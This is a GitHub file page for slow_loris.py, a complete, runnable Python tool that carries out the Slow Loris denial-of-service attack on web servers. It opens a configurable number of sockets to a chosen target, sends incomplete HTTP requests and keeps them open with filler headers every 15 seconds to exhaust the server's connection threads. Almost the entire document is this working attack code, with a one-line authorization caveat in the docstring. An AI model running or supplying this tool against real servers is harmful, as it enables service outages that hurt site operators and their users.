-
Notifications
You must be signed in to change notification settings - Fork 0
/
slow_loris.py
135 lines (117 loc) · 3.78 KB
/
slow_loris.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
This is a simple Python implementation of the Slow Loris attack.
Slow Loris only works on Apache servers, since Apache spawns a thread for
every new client.
Only run it against servers you own or are explicitly authorized to test.
"""
import time
import socket
import random
import argparse
# Header lines sent once per connection, right after the request line
# (see init_socket). Each entry is sent exactly as written here: the entries
# carry no trailing "\r\n". The backslash at the end of the first physical
# line is a line continuation inside the bytes literal, so the User-Agent
# value is a single element.
HEADERS = [
b"User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64;\
rv:49.0) Gecko/20100101 Firefox/49.0",
b"Accept-language: en-US,en,q=0.5",
]
def socket_error(sock):
    """Report a socket failure, close the socket and return ``None``.

    Returning ``None`` lets a caller drop its reference to the dead socket
    in one step: ``sock = socket_error(sock)``.
    """
    print("Socket error, killing socket")
    sock.close()
    return None
def init_socket(socket_t):
    """Open one connection and send the beginning of an HTTP request on it.

    Args:
        socket_t: An address-info tuple as returned by ``socket.getaddrinfo``;
            items 0-2 (family, type, protocol) build the socket and item 4 is
            the address passed to ``connect``.

    Returns:
        The connected socket after the request line and every entry of
        ``HEADERS`` have been sent, or ``None`` when connecting or sending
        failed (the socket is closed in that case).
    """
    family, kind, proto = socket_t[0], socket_t[1], socket_t[2]
    sock = socket.socket(family, kind, proto)
    try:
        sock.settimeout(15)
        # connect() is inside the try block so that a refused or timed-out
        # connection closes the socket and yields None instead of raising
        # out of the function and leaking the descriptor.
        sock.connect(socket_t[4])
        # sendall() retries until every byte is written; send() may stop
        # after a partial write.
        sock.sendall(b"GET /?%d HTTP/1.1\r\n" % random.randint(0, 5000))
        for header in HEADERS:
            sock.sendall(header)
    except OSError:
        # socket.timeout is an OSError subclass, so timeouts land here too.
        return socket_error(sock)
    return sock
def send_header(sock):
    """Send one more header line on ``sock`` so the request stays unfinished.

    Does nothing when ``sock`` is falsy. If the send fails with ``OSError``
    the error is printed, the socket is closed and it is removed from the
    module-level ``LIST_OF_SOCKETS``.
    """
    if not sock:
        return

    # A random value in an "X-a" header line, terminated by CRLF.
    filler = b"X-a: %d\r\n" % random.randint(1, 5000)
    try:
        sock.send(filler)
    except OSError as msg:
        print("Socket error:\n%s\n killing socket" % msg)
        sock.close()
        LIST_OF_SOCKETS.remove(sock)
def slow_loris(socket_tuple, sock_number):
    """Open ``sock_number`` connections and keep them alive until interrupted.

    First tries to create ``sock_number`` sockets with ``init_socket``. Then,
    every 15 seconds, sends a header line on each socket with ``send_header``
    and tries to re-create as many sockets as are missing from
    ``LIST_OF_SOCKETS``.

    Args:
        socket_tuple: Address-info tuple forwarded to ``init_socket``.
        sock_number: Number of sockets to maintain; assumed to be positive.

    This function loops forever and never returns normally. When it is left
    through an exception (for example ``KeyboardInterrupt``), every socket
    still in ``LIST_OF_SOCKETS`` is closed before the exception propagates.
    """
    try:
        for _ in range(sock_number):
            sock = init_socket(socket_tuple)
            if sock:
                LIST_OF_SOCKETS.append(sock)
                print("Created socket %d" % len(LIST_OF_SOCKETS))

        while True:
            print(
                "Sending keep-alive headers. "
                "Remaining sockets: %d" % len(LIST_OF_SOCKETS)
            )
            # send_header() removes failed sockets from LIST_OF_SOCKETS.
            # Iterating over a snapshot keeps that removal from making the
            # loop skip the element that follows a removed one.
            for sock in list(LIST_OF_SOCKETS):
                send_header(sock)

            # Top the pool back up to the requested size.
            for _ in range(sock_number - len(LIST_OF_SOCKETS)):
                sock = init_socket(socket_tuple)
                if sock:
                    LIST_OF_SOCKETS.append(sock)
                    print("Recreating socket...")
            time.sleep(15)
    finally:
        # Release every connection that is still open.
        for sock in LIST_OF_SOCKETS:
            sock.close()
        LIST_OF_SOCKETS.clear()
def validate_args(args):
    """Validate the parsed command-line arguments and resolve the target.

    Args:
        args: Namespace with ``number`` (int), ``port`` (int) and ``address``
            (str) attributes.

    Returns:
        The first entry returned by ``socket.getaddrinfo`` for
        ``args.address`` / ``args.port`` restricted to TCP.

    Raises:
        SystemExit: With exit status 1, after printing a message, when the
            socket count is not positive, the port is outside 1-65535, or the
            address cannot be resolved.
    """
    # SystemExit is raised directly: the ``exit`` helper is injected by the
    # ``site`` module and is not guaranteed to exist (e.g. ``python -S``).
    if args.number <= 0:
        print("[ERROR] Number of sockets should be positive. Received %d" % args.number)
        raise SystemExit(1)

    if not 0 < args.port < 65536:
        print("[ERROR] Port should be between 1 and 65535. Received %d" % args.port)
        raise SystemExit(1)

    # Is it a valid IP address or a resolvable name?
    try:
        servers = socket.getaddrinfo(args.address, args.port, proto=socket.IPPROTO_TCP)
    except socket.gaierror as error:
        print(error)
        print("Please, provide a valid IPv4, IPv6 address or a valid domain name.")
        raise SystemExit(1) from None
    return servers[0]
# Sockets currently held open. send_header() and slow_loris() look this name
# up as a module global, so it is defined at module level rather than only
# under the ``__main__`` guard; otherwise importing the module and calling
# those functions fails with NameError.
LIST_OF_SOCKETS = []


def main():
    """Parse the command line, validate it and start ``slow_loris``."""
    description = (
        "Attacks the web server at the given IP "
        "with the Slow Loris attack"
    )
    parser = argparse.ArgumentParser(description=description)
    parser.add_argument(
        "address",
        metavar="ADDRESS",
        help="The address or hostname to attack",
    )
    parser.add_argument(
        "-n", "--number",
        help="Number of sockets to open (default=200)",
        type=int,
        default=200,
    )
    parser.add_argument(
        "-p", "--port",
        help="Port to attack",
        type=int,
        default=80,
    )
    args = parser.parse_args()
    socket_tuple = validate_args(args)
    slow_loris(socket_tuple, args.number)


if __name__ == "__main__":
    main()